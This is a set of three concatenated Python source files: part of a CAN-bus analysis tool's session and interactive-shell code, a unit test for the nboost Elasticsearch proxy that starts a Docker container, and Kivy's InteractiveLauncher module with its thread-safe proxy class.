print reprCanMsg(idx, ts, arbid, msg, repr(msg))
def reprBookmarksIso(self):
'''
get a string representation of the bookmarks
'''
out = []
for bid in range(len(self.bookmarks_iso)):
out.append(self.reprBookmarkIso(bid))
return '\n'.join(out)
def reprBookmarkIso(self, bid):
'''
get a string representation of one bookmark
'''
msgidx = self.bookmarks_iso[bid]
info = self.bookmark_info_iso.get(bid)
comment = info.get('comment')
if comment == None:
return "bkmkidx: %d\tmsgidx: %d\tbkmk: %s" % (bid, msgidx, info.get('name'))
return "bkmkidx: %d\tmsgidx: %d\tbkmk: %s\tcomment: %s" % (bid, msgidx, info.get('name'), comment)
def restoreSession(self, me, force=False):
'''
Load a previous analysis session from a python dictionary object
see: saveSession()
'''
if isinstance(self._io, serial.Serial) and force==False:
print("Refusing to reload a session while active session! use 'force=True' option")
return
self._messages = me.get('messages')
self.bookmarks = me.get('bookmarks')
self.bookmark_info = me.get('bookmark_info')
self.comments = me.get('comments')
self.bookmarks_iso = me.get('bookmarks_iso')
self.bookmark_info_iso = me.get('bookmark_info_iso')
def saveSession(self):
'''
Save the current analysis session to a python dictionary object
What you do with it from there is your own business.
This function is called by saveSessionToFile() to get the data
to save to the file.
'''
savegame = { 'messages' : self._messages,
'bookmarks' : self.bookmarks,
'bookmark_info' : self.bookmark_info,
'bookmarks_iso' : self.bookmarks_iso,
'bookmark_info_iso' : self.bookmark_info_iso,
'comments' : self.comments,
}
return savegame
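# Illustrative sketch (not part of the original class): round-tripping an analysis
# session through the dictionary returned by saveSession(). 'citm' is assumed to be a
# CanInTheMiddleInterface instance; restoring onto a live interface requires
# force=True, as enforced in restoreSession() above.
#
#   session = citm.saveSession()
#   # ... later, e.g. after reconnecting or in a fresh process ...
#   citm.restoreSession(session, force=True)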
######### administrative, supporting code ##########
cs = []
def cleanupInteractiveAtExit():
global cs
for c in cs:
try:
c.__del__()
except:
pass
devlocs = [
'/dev/ttyACM0',
'/dev/ttyACM1',
'/dev/ttyACM2',
'/dev/tty.usbmodem1411',
'/dev/tty.usbmodem1421',
'/dev/tty.usbmodem1431',
]
def getDeviceFile():
for devloc in devlocs:
if os.path.exists(devloc):
return devloc
def interactive(port=None, InterfaceClass=CanInterface, intro='', load_filename=None, can_baud=None):
global c
import atexit
c = InterfaceClass(port=port, load_filename=load_filename)
# track the interface so cleanupInteractiveAtExit() can tear it down
cs.append(c)
atexit.register(cleanupInteractiveAtExit)
if load_filename is None:
if can_baud != None:
c.setCanBaud(can_baud)
else:
c.setCanBaud(CAN_500KBPS)
gbls = globals()
lcls = locals()
try:
import IPython.Shell
ipsh = IPython.Shell.IPShell(argv=[''], user_ns=lcls, user_global_ns=gbls)
print intro
ipsh.mainloop(intro)
except ImportError, e:
try:
from IPython.terminal.interactiveshell import TerminalInteractiveShell
ipsh = TerminalInteractiveShell()
ipsh.user_global_ns.update(gbls)
ipsh.user_global_ns.update(lcls)
ipsh.autocall = 2 # don't require parenthesis around *everything*. be smart!
ipsh.mainloop(intro)
except ImportError, e:
try:
from IPython.frontend.terminal.interactiveshell import TerminalInteractiveShell
ipsh = TerminalInteractiveShell()
ipsh.user_global_ns.update(gbls)
ipsh.user_global_ns.update(lcls)
ipsh.autocall = 2 # don't require parenthesis around *everything*. be smart!
ipsh.mainloop(intro)
except ImportError, e:
print e
shell = code.InteractiveConsole(gbls)
shell.interact(intro)
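# Illustrative sketch (not part of the original file): one plausible way to launch an
# interactive analysis session against whichever CanCat device is attached, using the
# helpers defined above (assumes a supported device enumerates at one of the devlocs paths):
#
#   port = getDeviceFile()
#   interactive(port=port, InterfaceClass=CanInTheMiddleInterface, can_baud=CAN_500KBPS)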
|
test_proxy.py
|
from nboost.proxy import Proxy
import subprocess
import unittest
import requests
from threading import Thread
from elasticsearch import Elasticsearch
import time
from pprint import pprint
class TestProxy(unittest.TestCase):
def test_travel_tutorial(self):
subprocess.call('docker pull elasticsearch:7.4.2', shell=True)
subprocess.call('docker run -d -p 9200:9200 -p 9300:9300 '
'-e "discovery.type=single-node" elasticsearch:7.4.2',
shell=True)
for _ in range(5):
Elasticsearch().index(index='example', body={'field': 'value'})
proxy = Proxy(
model_dir='shuffle-model',
model='ShuffleModelPlugin',
uport=9200,
debug=True,
verbose=True, query_prep='lambda query: query.split(":")[-1]'
)
t = Thread(target=proxy.run)
t.start()
time.sleep(2)
# search
proxy_res = requests.get(
'http://localhost:8000/example/_search',
params={
'q': 'field:value',
'size': 3,
'topn': 20
}
)
self.assertTrue(proxy_res.ok)
pprint(proxy_res.json())
response = proxy_res.json()['nboost']
self.assertEqual('value', response['query'])
self.assertEqual(3, response['topk'])
self.assertEqual(20, response['topn'])
self.assertEqual(3, len(response['cvalues']))
# fallback
fallback_res = requests.get('http://localhost:8000/')
self.assertTrue(fallback_res.ok)
print(fallback_res.content.decode())
# status
status_res = requests.get('http://localhost:8000/nboost/status')
self.assertTrue(status_res.ok)
print(status_res.content.decode())
# invalid host
invalid_res = requests.get('http://localhost:8000/example/_search', params={'uport': 2000})
print(invalid_res.content)
self.assertFalse(invalid_res.ok)
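# Minimal entry point (not part of the original test file) so the module can also be
# run directly as a script; assumes Docker is available and ports 9200/8000 are free.
if __name__ == '__main__':
    unittest.main()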
|
interactive.py
|
'''
Interactive launcher
====================
.. versionadded:: 1.3.0
The :class:`InteractiveLauncher` provides a user-friendly python shell
interface to an :class:`App` so that it can be prototyped and debugged
interactively.
.. note::
The Kivy API intends for some functions to only be run once or before the
main EventLoop has started. Methods that can normally be called during the
course of an application will work as intended, but specifically overriding
methods such as :meth:`on_touch` dynamically leads to trouble.
Creating an InteractiveLauncher
-------------------------------
Take your existing subclass of :class:`App` (this can be production code) and
pass an instance to the :class:`InteractiveLauncher` constructor.::
from kivy.interactive import InteractiveLauncher
from kivy.app import App
from kivy.uix.button import Button
class MyApp(App):
def build(self):
return Button(text='Hello Shell')
launcher = InteractiveLauncher(MyApp())
launcher.run()
After pressing *enter*, the script will return. This allows the interpreter to
continue running. Inspection or modification of the :class:`App` can be done
safely through the InteractiveLauncher instance or the provided
:class:`SafeMembrane` class instances.
.. note::
If you want to test this example, start Python without any file so that you
already have an interpreter, and copy/paste all the lines. You'll still have
the interpreter at the end, plus the Kivy application running.
Interactive Development
-----------------------
IPython provides a fast way to learn the Kivy API. The :class:`App` instance
and all of its attributes, including methods and the entire widget tree,
can be quickly listed by using the '.' operator and pressing 'tab'. Try this
code in an IPython shell.::
from kivy.interactive import InteractiveLauncher
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.graphics import Color, Ellipse
class MyPaintWidget(Widget):
def on_touch_down(self, touch):
with self.canvas:
Color(1, 1, 0)
d = 30.
Ellipse(pos=(touch.x - d/2, touch.y - d/2), size=(d, d))
class TestApp(App):
def build(self):
return Widget()
i = InteractiveLauncher(TestApp())
i.run()
i. # press 'tab' to list attributes of the app
i.root. # press 'tab' to list attributes of the root widget
# App is boring. Attach a new widget!
i.root.add_widget(MyPaintWidget())
i.safeIn()
# The application is now blocked.
# Click on the screen several times.
i.safeOut()
# The clicks will show up now
# Erase artwork and start over
i.root.canvas.clear()
.. note::
All of the proxies used in the module store their referent in the
:attr:`_ref` attribute, which can be accessed directly if needed, such as
for getting doc strings. :func:`help` and :func:`type` will access the
proxy, not its referent.
Directly Pausing the Application
--------------------------------
Both the :class:`InteractiveLauncher` and :class:`SafeMembrane` hold internal
references to the :class:`EventLoop`'s 'safe' and 'confirmed'
:class:`threading.Event` objects. You can use their safing methods to control
the application manually.
:meth:`SafeMembrane.safeIn` will cause the application to pause and
:meth:`SafeMembrane.safeOut` will allow a paused application
to continue running. This is potentially useful for scripting actions into
functions that need the screen to update etc.
.. note::
The pausing is implemented via the
:class:`Clocks' <kivy.clock.Clock>`
:meth:`~kivy.clock.ClockBase.schedule_once` method
and occurs before the start of each frame.
Adding Attributes Dynamically
-----------------------------
.. note::
This module uses threading and object proxies to encapsulate the running
:class:`App`. Deadlocks and memory corruption can occur if making direct
references inside the thread without going through the provided proxy(s).
The :class:`InteractiveLauncher` can have attributes added to it exactly like a
normal object and if these were created from outside the membrane, they will
not be threadsafe because the external references to them in the python
interpreter do not go through InteractiveLauncher's membrane behavior,
inherited from :class:`SafeMembrane`.
To threadsafe these external references, simply assign them to
:class:`SafeMembrane` instances of themselves like so::
from kivy.interactive import SafeMembrane
interactiveLauncher.attribute = myNewObject
# myNewObject is unsafe
myNewObject = SafeMembrane(myNewObject)
# myNewObject is now safe. Call at will.
myNewObject.method()
TODO
====
Unit tests, examples, and a better explanation of which methods are safe in a
running application would be nice. All three would be excellent.
Could be re-written with a context-manager style i.e.::
with safe:
foo()
Any use cases besides compacting code?
'''
__all__ = ('SafeMembrane', 'InteractiveLauncher')
from kivy.app import App
from kivy.base import EventLoop
from kivy.clock import Clock
from threading import Thread, Event
def safeWait(dt):
EventLoop.confirmed.set()
EventLoop.safe.wait()
EventLoop.confirmed.clear()
def unwrap(ob):
while type(ob) == SafeMembrane:
ob = ob._ref
return ob
class SafeMembrane(object):
'''
This help is for a proxy object. Did you want help on the proxy's referent
instead? Try using help(<instance>._ref)
The SafeMembrane is a threadsafe proxy that also returns attributes as new
thread-safe objects
and makes thread-safe method calls, preventing thread-unsafe objects
from leaking into the user's environment.
'''
__slots__ = ('_ref', 'safe', 'confirmed')
def __init__(self, ob, *args, **kwargs):
self.confirmed = EventLoop.confirmed
self.safe = EventLoop.safe
self._ref = ob
def safeIn(self):
"""Provides a thread-safe entry point for interactive launching."""
self.safe.clear()
Clock.schedule_once(safeWait, -1)
self.confirmed.wait()
def safeOut(self):
"""Provides a thread-safe exit point for interactive launching."""
self.safe.set()
def isMethod(self, fn):
return type(fn) is type(self.isMethod)
# Everything from this point on is just a series of thread-safing proxy
# methods that make calls against _ref and threadsafe whenever data will be
# written to or if a method will be called. SafeMembrane instances should
# be unwrapped whenever passing them into the thread
#use type() to determine if an object is a SafeMembrane while debugging
def __repr__(self):
return self._ref.__repr__()
def __call__(self, *args, **kw):
self.safeIn()
args = list(map(unwrap, args))
for k in list(kw.keys()):
kw[k] = unwrap(kw[k])
r = self._ref(*args, **kw)
self.safeOut()
if r is not None:
return SafeMembrane(r)
def __getattribute__(self, attr, oga=object.__getattribute__):
if attr.startswith('__') or attr == '_ref':
subject = oga(self, '_ref')
if attr == '_ref':
return subject
return getattr(subject, attr)
return oga(self, attr)
def __getattr__(self, attr, oga=object.__getattribute__):
r = getattr(oga(self, '_ref'), attr)
return SafeMembrane(r)
def __setattr__(self, attr, val, osa=object.__setattr__):
if (attr == '_ref'
or hasattr(type(self), attr) and not attr.startswith('__')):
osa(self, attr, val)
else:
self.safeIn()
val = unwrap(val)
setattr(self._ref, attr, val)
self.safeOut()
def __delattr__(self, attr, oda=object.__delattr__):
self.safeIn()
delattr(self._ref, attr)
self.safeOut()
def __bool__(self):
return bool(self._ref)
def __getitem__(self, arg):
return SafeMembrane(self._ref[arg])
def __setitem__(self, arg, val):
self.safeIn()
val = unwrap(val)
self._ref[arg] = val
self.safeOut()
def __delitem__(self, arg):
self.safeIn()
del self._ref[arg]
self.safeOut()
def __getslice__(self, i, j):
return SafeMembrane(self._ref[i:j])
def __setslice__(self, i, j, val):
self.safeIn()
val = unwrap(val)
self._ref[i:j] = val
self.safeOut()
def __delslice__(self, i, j):
self.safeIn()
del self._ref[i:j]
self.safeOut()
def __enter__(self, *args, **kwargs):
self.safeIn()
self._ref.__enter__(*args, **kwargs)
def __exit__(self, *args, **kwargs):
self._ref.__exit__(*args, **kwargs)
self.safeOut()
class InteractiveLauncher(SafeMembrane):
'''
Proxy to an application instance that launches it in a thread and
then returns and acts as a proxy to the application in the thread.
'''
__slots__ = ('_ref', 'safe', 'confirmed', 'thread', 'app')
def __init__(self, app=None, *args, **kwargs):
if app is None:
app = App()
EventLoop.safe = Event()
self.safe = EventLoop.safe
self.safe.set()
EventLoop.confirmed = Event()
self.confirmed = EventLoop.confirmed
self.app = app
def startApp(app=app, *args, **kwargs):
app.run(*args, **kwargs)
self.thread = Thread(target=startApp, *args, **kwargs)
def run(self):
self.thread.start()
#Proxy behavior starts after this is set. Before this point, attaching
#widgets etc can only be done through the Launcher's app attribute
self._ref = self.app
def stop(self):
EventLoop.quit = True
self.thread.join()
#Act like the app instance even before _ref is set
def __repr__(self):
return self.app.__repr__()
|